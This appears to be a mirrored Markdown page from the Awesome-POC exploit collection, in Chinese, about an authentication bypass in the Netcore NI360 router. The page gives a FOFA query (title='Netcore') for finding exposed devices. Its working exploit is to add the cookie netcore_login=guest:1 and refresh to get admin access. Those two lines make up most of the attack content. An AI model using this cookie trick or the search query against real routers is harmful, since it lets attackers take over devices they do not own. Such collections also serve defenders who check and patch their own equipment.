mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
29 lines
512 B
Markdown
29 lines
512 B
Markdown
|
|
# 磊科 NI360路由器 认证绕过漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
磊科 NI360路由器 存在认证绕过漏洞,通过添加特定的Cookie字段获取后台权限
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
磊科 NI360路由器
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title="Netcore"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
登录页面如下
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
添加 Cookie字段 : **netcore_login=guest:1**
|
|||
|
|
|
|||
|
|
刷新后登录后台
|
|||
|
|
|
|||
|
|

|